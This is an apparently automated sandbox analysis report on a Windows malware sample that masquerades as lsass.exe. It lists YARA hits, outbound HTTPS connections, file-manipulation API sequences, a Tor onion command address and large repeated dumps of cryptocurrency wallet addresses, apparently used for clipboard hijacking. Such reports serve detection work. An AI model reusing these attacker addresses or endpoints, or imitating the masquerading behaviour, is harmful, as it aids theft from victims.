Source: Yara match	File source: Process Memory Space: lsass.exe PID: 4596, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lsass.exe PID: 5308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lsass.exe PID: 2884, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lsass.exe PID: 3320, type: MEMORYSTR

Source: 6K1uYM85lS.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 149.56.44.47:443 -> 192.168.2.6:49729 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.81.131.84:443 -> 192.168.2.6:49732 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 207.244.78.230:443 -> 192.168.2.6:49735 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 66.175.235.244:443 -> 192.168.2.6:49736 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.81.131.84:443 -> 192.168.2.6:49759 version: TLS 1.0

Source: 6K1uYM85lS.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009B09F0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_009B09F0
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009B0B30 wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	0_2_009B0B30
Source: C:\180771693628709\lsass.exe	Code function: 5_2_00780B30 wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	5_2_00780B30
Source: C:\180771693628709\lsass.exe	Code function: 5_2_007809F0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	5_2_007809F0

Networking

Found Tor onion address

Source: 6K1uYM85lS.exe	String found in binary or memory: http://7fv5nq57k4qvbrpt.onion/
Source: 6K1uYM85lS.exe, 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http%s://%shttps://Proxy-Proxy-Authenticate:NTLMNegotiateKerberosContent-Length:Transfer-Encoding:chunked:443Host:.onion.onionHTTP/1.0 200 OK
Source: 6K1uYM85lS.exe, 00000000.00000002.2255091970.000000000153D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://7fv5nq57k4qvbrpt.onion/
Source: 6K1uYM85lS.exe, 00000000.00000002.2255091970.000000000153D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: bitcoincash:cosmosaddrbitcoincash:11650607608992768899Laddr15DBeUGFSQLbpYvWLJwzHUXSRrHNU9uQuS8c2wvFLZ7Nxz3N1E5ZxnNUbbGQarWjMA7tCwp3Btm38GvRkv3AcMV5pSUcxMmmcMbfSkJXRKbCrF3ysUDJbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrXkcKjKZqNUkChwJXMj5uDjDns6etXvakirD7MYki8urW3xq8sZJ8Q2v2ZrHxjzp7ACvb0x76e4CB2fcf7f931Fd750e93F443536Ee068d1cdELfYFvpk2hccXw12tN3BBMWh7EcUBMbKoTGrUQFcff9R1eKAwTtR1wbuQxmcoB236mz44TEUaG7jyXdyrDS3JeEg1w1hotmmEMjx4TBt1gTRxsrEXwky32j22jgFRZAafBzmCV2M2Vtz1ZT5ezLqmcqPANNCHRGtjv7YmxU4Yqu9FYhx5f9a4862a5b87d76d60b8ae85e229f892279d49aQWU6ht2csXYcfG4KQW8yUxJtBQfCCjqvJQRTWARPyPyMgJSUNELV6wkSThjh2ub5CyzEND2BUO56NOATM7KNB6EFEJSJX3GKYS2BD35BPEAEAT5Vm3ZrUg98s9kBue2g9YjnwK4kFKhQw3SdRjRfVx6vKYW7jfpAGSN5pqBSF9WC89wdzil1vmhlqflzamfx0qfn5cykze2hkvmxx3tfs72gxts1j6xPi597KmKbLDAz1EaetoMFys2F1p8zwbitcoincashbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrcosmoscosmos19npkky36nzgsxlpqpqs8u9llzplxrmpn6fl86nband44L2q3sPJ3DMJZiuSpHvehHMLbMXx3SAoVbLm5DWDw1A7PhUvcCPAGg5qAN98DWAUG7CuD4WmydP4JkewTz2aeVd4qhS822addr1qyyg6wrlggj0m6f8pv3knku3cdfpexggr4hs5ykh9rj54mwzzh6mevr775jm9kq2qx9nmppqtc3rlhqfkmp8ksgmrv2q2t3mjfFiFHQh6rA5wx2TXrEG7MfTcMr42znDeBPhGBLUYL3QTKP3NXVWCYNZ7ZH4CWFT6PVCXEYCNUNSHM34WKG2UL5EDQMVbnbU24188479bnb154sx9pdh8er33ujxlpfk3zwvlfp9rd5rskvvgcband1jr36wwpn6zq7a3de04fh8wz6vnqmg77tlckpa4bcbc1qn4r93am7rxxr4a5dwydhwx0p2kd4xfd7mz42f3E27440746B23181897bitcoincash:cosmosaddrbitcoincash:11650607608992768899L15DBeUGFSQLbpYvWLJwzHUXSRrHNU9uQuS8c2wvFLZ7Nxz3N1E5ZxnNUbbGQarWjMA7tCwp3Btm38GvRkv3AcMV5pSUcxMmmcMbfSkJXRKbCrF3ysUDJbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrXkcKjKZqNUkChwJXMj5uDjDns6etXvakirD7MYki8urW3xq8sZJ8Q2v2ZrHxjzp7ACvb0x76e4CB2fcf7f931Fd750e93F443536Ee068d1cdELfYFvpk2hccXw12tN3BBMWh7EcUBMbKoTGrUQFcff9R1eKAwTtR1wbuQxmcoB236mz44TEUaG7jyXdyrDS3JeEg1w1hotmmEMjx4TBt1gTRxsrEXwky32j22jgFRZAafBzmCV2M2Vtz1ZT5ezLqmcqPANNCHRGtjv7YmxU4Yqu9FYhx5f9a4862a5b87d76d60b8ae85e229f892279d49aQWU6ht2csXYcfG4KQW8yUxJtBQfCCjqvJQRTWARPyPyMgJSUNELV6wkSThjh2ub5CyzEND2BUO56NOATM7KNB6EFEJSJX3GKYS2BD35BPEAEAT5Vm3ZrUg98s9kBue2g9YjnwK4kFKhQw3SdRjRfVx6vKYW7jfpAGSN5pqBSF9WC89wdzil1vmhlqflzamfx0qfn5cykze2hkvmxx3tfs72gxts1j6xPi597KmKbLDAz1EaetoMFys2F1p8zwbitcoincashbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrcosmoscosmos19npkky36nzgsxlpqpqs8u9llzplxrmpn6fl86n44L2q3sPJ3DMJZiuSpHvehHMLbMXx3SAoVbLm5DWDw1A7PhUvcCPAGg5qAN98DWAUG7CuD4WmydP4JkewTz2aeVd4qhS822addraddr1qyyg6wrlggj0m6f8pv3knku3cdfpexggr4hs5ykh9rj54mwzzh6mevr775jm9kq2qx9nmppqtc3rlhqfkmp8ksgmrv2q2t3mjfFiFHQh6rA5wx2TXrEG7MfTcMr42znDeBPhGBLUYL3QTKP3NXVWCYNZ7ZH4CWFT6PVCXEYCNUNSHM34WKG2UL5EDQMVbnbbnb154sx9pdh8er33ujxlpfk3zwvlfp9rd5rskvvgcbandband1jr36wwpn6zq7a3de04fh8wz6vnqmg77tlckpa4bcbc1qn4r93am7rxxr4a5dwydhwx0p2kd4xfd7mz42f3U24188479E27440746B23181897openTldrrbUKRMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36http://api.wipmania.com/UAMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.9
Source: 6K1uYM85lS.exe, 00000000.00000002.2255091970.000000000153D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http%s://%shttps://Proxy-Proxy-Authenticate:NTLMNegotiateKerberosContent-Length:Transfer-Encoding:chunked:443Host:.onion.onionHTTP/1.0 200 OK
Source: 6K1uYM85lS.exe, 00000000.00000000.2106850218.00000000009B5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://7fv5nq57k4qvbrpt.onion/
Source: 6K1uYM85lS.exe, 00000000.00000000.2106850218.00000000009B5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: bitcoincash:cosmosaddrbitcoincash:11650607608992768899Laddr15DBeUGFSQLbpYvWLJwzHUXSRrHNU9uQuS8c2wvFLZ7Nxz3N1E5ZxnNUbbGQarWjMA7tCwp3Btm38GvRkv3AcMV5pSUcxMmmcMbfSkJXRKbCrF3ysUDJbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrXkcKjKZqNUkChwJXMj5uDjDns6etXvakirD7MYki8urW3xq8sZJ8Q2v2ZrHxjzp7ACvb0x76e4CB2fcf7f931Fd750e93F443536Ee068d1cdELfYFvpk2hccXw12tN3BBMWh7EcUBMbKoTGrUQFcff9R1eKAwTtR1wbuQxmcoB236mz44TEUaG7jyXdyrDS3JeEg1w1hotmmEMjx4TBt1gTRxsrEXwky32j22jgFRZAafBzmCV2M2Vtz1ZT5ezLqmcqPANNCHRGtjv7YmxU4Yqu9FYhx5f9a4862a5b87d76d60b8ae85e229f892279d49aQWU6ht2csXYcfG4KQW8yUxJtBQfCCjqvJQRTWARPyPyMgJSUNELV6wkSThjh2ub5CyzEND2BUO56NOATM7KNB6EFEJSJX3GKYS2BD35BPEAEAT5Vm3ZrUg98s9kBue2g9YjnwK4kFKhQw3SdRjRfVx6vKYW7jfpAGSN5pqBSF9WC89wdzil1vmhlqflzamfx0qfn5cykze2hkvmxx3tfs72gxts1j6xPi597KmKbLDAz1EaetoMFys2F1p8zwbitcoincashbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrcosmoscosmos19npkky36nzgsxlpqpqs8u9llzplxrmpn6fl86nband44L2q3sPJ3DMJZiuSpHvehHMLbMXx3SAoVbLm5DWDw1A7PhUvcCPAGg5qAN98DWAUG7CuD4WmydP4JkewTz2aeVd4qhS822addr1qyyg6wrlggj0m6f8pv3knku3cdfpexggr4hs5ykh9rj54mwzzh6mevr775jm9kq2qx9nmppqtc3rlhqfkmp8ksgmrv2q2t3mjfFiFHQh6rA5wx2TXrEG7MfTcMr42znDeBPhGBLUYL3QTKP3NXVWCYNZ7ZH4CWFT6PVCXEYCNUNSHM34WKG2UL5EDQMVbnbU24188479bnb154sx9pdh8er33ujxlpfk3zwvlfp9rd5rskvvgcband1jr36wwpn6zq7a3de04fh8wz6vnqmg77tlckpa4bcbc1qn4r93am7rxxr4a5dwydhwx0p2kd4xfd7mz42f3E27440746B23181897bitcoincash:cosmosaddrbitcoincash:11650607608992768899L15DBeUGFSQLbpYvWLJwzHUXSRrHNU9uQuS8c2wvFLZ7Nxz3N1E5ZxnNUbbGQarWjMA7tCwp3Btm38GvRkv3AcMV5pSUcxMmmcMbfSkJXRKbCrF3ysUDJbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrXkcKjKZqNUkChwJXMj5uDjDns6etXvakirD7MYki8urW3xq8sZJ8Q2v2ZrHxjzp7ACvb0x76e4CB2fcf7f931Fd750e93F443536Ee068d1cdELfYFvpk2hccXw12tN3BBMWh7EcUBMbKoTGrUQFcff9R1eKAwTtR1wbuQxmcoB236mz44TEUaG7jyXdyrDS3JeEg1w1hotmmEMjx4TBt1gTRxsrEXwky32j22jgFRZAafBzmCV2M2Vtz1ZT5ezLqmcqPANNCHRGtjv7YmxU4Yqu9FYhx5f9a4862a5b87d76d60b8ae85e229f892279d49aQWU6ht2csXYcfG4KQW8yUxJtBQfCCjqvJQRTWARPyPyMgJSUNELV6wkSThjh2ub5CyzEND2BUO56NOATM7KNB6EFEJSJX3GKYS2BD35BPEAEAT5Vm3ZrUg98s9kBue2g9YjnwK4kFKhQw3SdRjRfVx6vKYW7jfpAGSN5pqBSF9WC89wdzil1vmhlqflzamfx0qfn5cykze2hkvmxx3tfs72gxts1j6xPi597KmKbLDAz1EaetoMFys2F1p8zwbitcoincashbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrcosmoscosmos19npkky36nzgsxlpqpqs8u9llzplxrmpn6fl86n44L2q3sPJ3DMJZiuSpHvehHMLbMXx3SAoVbLm5DWDw1A7PhUvcCPAGg5qAN98DWAUG7CuD4WmydP4JkewTz2aeVd4qhS822addraddr1qyyg6wrlggj0m6f8pv3knku3cdfpexggr4hs5ykh9rj54mwzzh6mevr775jm9kq2qx9nmppqtc3rlhqfkmp8ksgmrv2q2t3mjfFiFHQh6rA5wx2TXrEG7MfTcMr42znDeBPhGBLUYL3QTKP3NXVWCYNZ7ZH4CWFT6PVCXEYCNUNSHM34WKG2UL5EDQMVbnbbnb154sx9pdh8er33ujxlpfk3zwvlfp9rd5rskvvgcbandband1jr36wwpn6zq7a3de04fh8wz6vnqmg77tlckpa4bcbc1qn4r93am7rxxr4a5dwydhwx0p2kd4xfd7mz42f3U24188479E27440746B23181897openTldrrbUKRMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36http://api.wipmania.com/UAMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.9
Source: 6K1uYM85lS.exe, 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://7fv5nq57k4qvbrpt.onion/
Source: 6K1uYM85lS.exe, 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: bitcoincash:cosmosaddrbitcoincash:11650607608992768899Laddr15DBeUGFSQLbpYvWLJwzHUXSRrHNU9uQuS8c2wvFLZ7Nxz3N1E5ZxnNUbbGQarWjMA7tCwp3Btm38GvRkv3AcMV5pSUcxMmmcMbfSkJXRKbCrF3ysUDJbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrXkcKjKZqNUkChwJXMj5uDjDns6etXvakirD7MYki8urW3xq8sZJ8Q2v2ZrHxjzp7ACvb0x76e4CB2fcf7f931Fd750e93F443536Ee068d1cdELfYFvpk2hccXw12tN3BBMWh7EcUBMbKoTGrUQFcff9R1eKAwTtR1wbuQxmcoB236mz44TEUaG7jyXdyrDS3JeEg1w1hotmmEMjx4TBt1gTRxsrEXwky32j22jgFRZAafBzmCV2M2Vtz1ZT5ezLqmcqPANNCHRGtjv7YmxU4Yqu9FYhx5f9a4862a5b87d76d60b8ae85e229f892279d49aQWU6ht2csXYcfG4KQW8yUxJtBQfCCjqvJQRTWARPyPyMgJSUNELV6wkSThjh2ub5CyzEND2BUO56NOATM7KNB6EFEJSJX3GKYS2BD35BPEAEAT5Vm3ZrUg98s9kBue2g9YjnwK4kFKhQw3SdRjRfVx6vKYW7jfpAGSN5pqBSF9WC89wdzil1vmhlqflzamfx0qfn5cykze2hkvmxx3tfs72gxts1j6xPi597KmKbLDAz1EaetoMFys2F1p8zwbitcoincashbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrcosmoscosmos19npkky36nzgsxlpqpqs8u9llzplxrmpn6fl86nband44L2q3sPJ3DMJZiuSpHvehHMLbMXx3SAoVbLm5DWDw1A7PhUvcCPAGg5qAN98DWAUG7CuD4WmydP4JkewTz2aeVd4qhS822addr1qyyg6wrlggj0m6f8pv3knku3cdfpexggr4hs5ykh9rj54mwzzh6mevr775jm9kq2qx9nmppqtc3rlhqfkmp8ksgmrv2q2t3mjfFiFHQh6rA5wx2TXrEG7MfTcMr42znDeBPhGBLUYL3QTKP3NXVWCYNZ7ZH4CWFT6PVCXEYCNUNSHM34WKG2UL5EDQMVbnbU24188479bnb154sx9pdh8er33ujxlpfk3zwvlfp9rd5rskvvgcband1jr36wwpn6zq7a3de04fh8wz6vnqmg77tlckpa4bcbc1qn4r93am7rxxr4a5dwydhwx0p2kd4xfd7mz42f3E27440746B23181897bitcoincash:cosmosaddrbitcoincash:11650607608992768899L15DBeUGFSQLbpYvWLJwzHUXSRrHNU9uQuS8c2wvFLZ7Nxz3N1E5ZxnNUbbGQarWjMA7tCwp3Btm38GvRkv3AcMV5pSUcxMmmcMbfSkJXRKbCrF3ysUDJbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrXkcKjKZqNUkChwJXMj5uDjDns6etXvakirD7MYki8urW3xq8sZJ8Q2v2ZrHxjzp7ACvb0x76e4CB2fcf7f931Fd750e93F443536Ee068d1cdELfYFvpk2hccXw12tN3BBMWh7EcUBMbKoTGrUQFcff9R1eKAwTtR1wbuQxmcoB236mz44TEUaG7jyXdyrDS3JeEg1w1hotmmEMjx4TBt1gTRxsrEXwky32j22jgFRZAafBzmCV2M2Vtz1ZT5ezLqmcqPANNCHRGtjv7YmxU4Yqu9FYhx5f9a4862a5b87d76d60b8ae85e229f892279d49aQWU6ht2csXYcfG4KQW8yUxJtBQfCCjqvJQRTWARPyPyMgJSUNELV6wkSThjh2ub5CyzEND2BUO56NOATM7KNB6EFEJSJX3GKYS2BD35BPEAEAT5Vm3ZrUg98s9kBue2g9YjnwK4kFKhQw3SdRjRfVx6vKYW7jfpAGSN5pqBSF9WC89wdzil1vmhlqflzamfx0qfn5cykze2hkvmxx3tfs72gxts1j6xPi597KmKbLDAz1EaetoMFys2F1p8zwbitcoincashbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrcosmoscosmos19npkky36nzgsxlpqpqs8u9llzplxrmpn6fl86n44L2q3sPJ3DMJZiuSpHvehHMLbMXx3SAoVbLm5DWDw1A7PhUvcCPAGg5qAN98DWAUG7CuD4WmydP4JkewTz2aeVd4qhS822addraddr1qyyg6wrlggj0m6f8pv3knku3cdfpexggr4hs5ykh9rj54mwzzh6mevr775jm9kq2qx9nmppqtc3rlhqfkmp8ksgmrv2q2t3mjfFiFHQh6rA5wx2TXrEG7MfTcMr42znDeBPhGBLUYL3QTKP3NXVWCYNZ7ZH4CWFT6PVCXEYCNUNSHM34WKG2UL5EDQMVbnbbnb154sx9pdh8er33ujxlpfk3zwvlfp9rd5rskvvgcbandband1jr36wwpn6zq7a3de04fh8wz6vnqmg77tlckpa4bcbc1qn4r93am7rxxr4a5dwydhwx0p2kd4xfd7mz42f3U24188479E27440746B23181897openTldrrbUKRMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36http://api.wipmania.com/UAMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.9
Source: 6K1uYM85lS.exe, 00000000.00000002.2254661523.00000000012FA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://7fv5nq57k4qvbrpt.onion/
Source: 6K1uYM85lS.exe, 00000000.00000002.2254661523.00000000012FA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://7fv5nq57k4qvbrpt.onion/C:\Users\user\Desktop\6K1uYM85lS.exe:Zone.Identifier
Source: 6K1uYM85lS.exe, 00000000.00000000.2106866608.00000000009B9000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http%s://%shttps://Proxy-Proxy-Authenticate:NTLMNegotiateKerberosContent-Length:Transfer-Encoding:chunked:443Host:.onion.onionHTTP/1.0 200 OK
Source: lsass.exe, 00000003.00000000.2241430412.0000000000785000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://7fv5nq57k4qvbrpt.onion/
Source: lsass.exe, 00000003.00000000.2241430412.0000000000785000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: bitcoincash:cosmosaddrbitcoincash:11650607608992768899Laddr15DBeUGFSQLbpYvWLJwzHUXSRrHNU9uQuS8c2wvFLZ7Nxz3N1E5ZxnNUbbGQarWjMA7tCwp3Btm38GvRkv3AcMV5pSUcxMmmcMbfSkJXRKbCrF3ysUDJbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrXkcKjKZqNUkChwJXMj5uDjDns6etXvakirD7MYki8urW3xq8sZJ8Q2v2ZrHxjzp7ACvb0x76e4CB2fcf7f931Fd750e93F443536Ee068d1cdELfYFvpk2hccXw12tN3BBMWh7EcUBMbKoTGrUQFcff9R1eKAwTtR1wbuQxmcoB236mz44TEUaG7jyXdyrDS3JeEg1w1hotmmEMjx4TBt1gTRxsrEXwky32j22jgFRZAafBzmCV2M2Vtz1ZT5ezLqmcqPANNCHRGtjv7YmxU4Yqu9FYhx5f9a4862a5b87d76d60b8ae85e229f892279d49aQWU6ht2csXYcfG4KQW8yUxJtBQfCCjqvJQRTWARPyPyMgJSUNELV6wkSThjh2ub5CyzEND2BUO56NOATM7KNB6EFEJSJX3GKYS2BD35BPEAEAT5Vm3ZrUg98s9kBue2g9YjnwK4kFKhQw3SdRjRfVx6vKYW7jfpAGSN5pqBSF9WC89wdzil1vmhlqflzamfx0qfn5cykze2hkvmxx3tfs72gxts1j6xPi597KmKbLDAz1EaetoMFys2F1p8zwbitcoincashbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrcosmoscosmos19npkky36nzgsxlpqpqs8u9llzplxrmpn6fl86nband44L2q3sPJ3DMJZiuSpHvehHMLbMXx3SAoVbLm5DWDw1A7PhUvcCPAGg5qAN98DWAUG7CuD4WmydP4JkewTz2aeVd4qhS822addr1qyyg6wrlggj0m6f8pv3knku3cdfpexggr4hs5ykh9rj54mwzzh6mevr775jm9kq2qx9nmppqtc3rlhqfkmp8ksgmrv2q2t3mjfFiFHQh6rA5wx2TXrEG7MfTcMr42znDeBPhGBLUYL3QTKP3NXVWCYNZ7ZH4CWFT6PVCXEYCNUNSHM34WKG2UL5EDQMVbnbU24188479bnb154sx9pdh8er33ujxlpfk3zwvlfp9rd5rskvvgcband1jr36wwpn6zq7a3de04fh8wz6vnqmg77tlckpa4bcbc1qn4r93am7rxxr4a5dwydhwx0p2kd4xfd7mz42f3E27440746B23181897bitcoincash:cosmosaddrbitcoincash:11650607608992768899L15DBeUGFSQLbpYvWLJwzHUXSRrHNU9uQuS8c2wvFLZ7Nxz3N1E5ZxnNUbbGQarWjMA7tCwp3Btm38GvRkv3AcMV5pSUcxMmmcMbfSkJXRKbCrF3ysUDJbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrXkcKjKZqNUkChwJXMj5uDjDns6etXvakirD7MYki8urW3xq8sZJ8Q2v2ZrHxjzp7ACvb0x76e4CB2fcf7f931Fd750e93F443536Ee068d1cdELfYFvpk2hccXw12tN3BBMWh7EcUBMbKoTGrUQFcff9R1eKAwTtR1wbuQxmcoB236mz44TEUaG7jyXdyrDS3JeEg1w1hotmmEMjx4TBt1gTRxsrEXwky32j22jgFRZAafBzmCV2M2Vtz1ZT5ezLqmcqPANNCHRGtjv7YmxU4Yqu9FYhx5f9a4862a5b87d76d60b8ae85e229f892279d49aQWU6ht2csXYcfG4KQW8yUxJtBQfCCjqvJQRTWARPyPyMgJSUNELV6wkSThjh2ub5CyzEND2BUO56NOATM7KNB6EFEJSJX3GKYS2BD35BPEAEAT5Vm3ZrUg98s9kBue2g9YjnwK4kFKhQw3SdRjRfVx6vKYW7jfpAGSN5pqBSF9WC89wdzil1vmhlqflzamfx0qfn5cykze2hkvmxx3tfs72gxts1j6xPi597KmKbLDAz1EaetoMFys2F1p8zwbitcoincashbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrcosmoscosmos19npkky36nzgsxlpqpqs8u9llzplxrmpn6fl86n44L2q3sPJ3DMJZiuSpHvehHMLbMXx3SAoVbLm5DWDw1A7PhUvcCPAGg5qAN98DWAUG7CuD4WmydP4JkewTz2aeVd4qhS822addraddr1qyyg6wrlggj0m6f8pv3knku3cdfpexggr4hs5ykh9rj54mwzzh6mevr775jm9kq2qx9nmppqtc3rlhqfkmp8ksgmrv2q2t3mjfFiFHQh6rA5wx2TXrEG7MfTcMr42znDeBPhGBLUYL3QTKP3NXVWCYNZ7ZH4CWFT6PVCXEYCNUNSHM34WKG2UL5EDQMVbnbbnb154sx9pdh8er33ujxlpfk3zwvlfp9rd5rskvvgcbandband1jr36wwpn6zq7a3de04fh8wz6vnqmg77tlckpa4bcbc1qn4r93am7rxxr4a5dwydhwx0p2kd4xfd7mz42f3U24188479E27440746B23181897openTldrrbUKRMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36http://api.wipmania.com/UAMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.9
Source: lsass.exe, 00000003.00000000.2241456556.0000000000789000.00000008.00000001.01000000.00000006.sdmp	String found in binary or memory: http%s://%shttps://Proxy-Proxy-Authenticate:NTLMNegotiateKerberosContent-Length:Transfer-Encoding:chunked:443Host:.onion.onionHTTP/1.0 200 OK
Source: lsass.exe	String found in binary or memory: http://7fv5nq57k4qvbrpt.onion/
Source: lsass.exe, 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://7fv5nq57k4qvbrpt.onion/
Source: lsass.exe, 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: bitcoincash:cosmosaddrbitcoincash:11650607608992768899Laddr15DBeUGFSQLbpYvWLJwzHUXSRrHNU9uQuS8c2wvFLZ7Nxz3N1E5ZxnNUbbGQarWjMA7tCwp3Btm38GvRkv3AcMV5pSUcxMmmcMbfSkJXRKbCrF3ysUDJbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrXkcKjKZqNUkChwJXMj5uDjDns6etXvakirD7MYki8urW3xq8sZJ8Q2v2ZrHxjzp7ACvb0x76e4CB2fcf7f931Fd750e93F443536Ee068d1cdELfYFvpk2hccXw12tN3BBMWh7EcUBMbKoTGrUQFcff9R1eKAwTtR1wbuQxmcoB236mz44TEUaG7jyXdyrDS3JeEg1w1hotmmEMjx4TBt1gTRxsrEXwky32j22jgFRZAafBzmCV2M2Vtz1ZT5ezLqmcqPANNCHRGtjv7YmxU4Yqu9FYhx5f9a4862a5b87d76d60b8ae85e229f892279d49aQWU6ht2csXYcfG4KQW8yUxJtBQfCCjqvJQRTWARPyPyMgJSUNELV6wkSThjh2ub5CyzEND2BUO56NOATM7KNB6EFEJSJX3GKYS2BD35BPEAEAT5Vm3ZrUg98s9kBue2g9YjnwK4kFKhQw3SdRjRfVx6vKYW7jfpAGSN5pqBSF9WC89wdzil1vmhlqflzamfx0qfn5cykze2hkvmxx3tfs72gxts1j6xPi597KmKbLDAz1EaetoMFys2F1p8zwbitcoincashbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrcosmoscosmos19npkky36nzgsxlpqpqs8u9llzplxrmpn6fl86nband44L2q3sPJ3DMJZiuSpHvehHMLbMXx3SAoVbLm5DWDw1A7PhUvcCPAGg5qAN98DWAUG7CuD4WmydP4JkewTz2aeVd4qhS822addr1qyyg6wrlggj0m6f8pv3knku3cdfpexggr4hs5ykh9rj54mwzzh6mevr775jm9kq2qx9nmppqtc3rlhqfkmp8ksgmrv2q2t3mjfFiFHQh6rA5wx2TXrEG7MfTcMr42znDeBPhGBLUYL3QTKP3NXVWCYNZ7ZH4CWFT6PVCXEYCNUNSHM34WKG2UL5EDQMVbnbU24188479bnb154sx9pdh8er33ujxlpfk3zwvlfp9rd5rskvvgcband1jr36wwpn6zq7a3de04fh8wz6vnqmg77tlckpa4bcbc1qn4r93am7rxxr4a5dwydhwx0p2kd4xfd7mz42f3E27440746B23181897bitcoincash:cosmosaddrbitcoincash:11650607608992768899L15DBeUGFSQLbpYvWLJwzHUXSRrHNU9uQuS8c2wvFLZ7Nxz3N1E5ZxnNUbbGQarWjMA7tCwp3Btm38GvRkv3AcMV5pSUcxMmmcMbfSkJXRKbCrF3ysUDJbitcoincash:qqucl3fev20z4upudppa8p5hd6j3zzgyfuwae00pfrXkcKjKZqNUkChwJXMj5uDjDns6etXvakirD7MYki8urW3xq8sZJ8Q2v2ZrHxjzp7ACvb0x76e4CB2fcf7f931Fd750e93F443536Ee068d1cdELfYFvpk2hccXw12tN3BBMWh7EcUBMbKoTGrUQFcff9R1eKAwTtR1wbuQxmcoB236mz44TEUaG7jyXdyrDS3JeEg1w1hotmmEMjx4TBt1gTRxsrEXwky32j22jgFRZAafBzmCV2M2Vtz1ZT5ezLqmcqPANNCHRGtjv7YmxU4Yqu9FYhx5f9a4862a5b87d76d60b8ae85e229f892279d49aQWU6ht2csXYcfG4KQW8yUxJtBQfCCj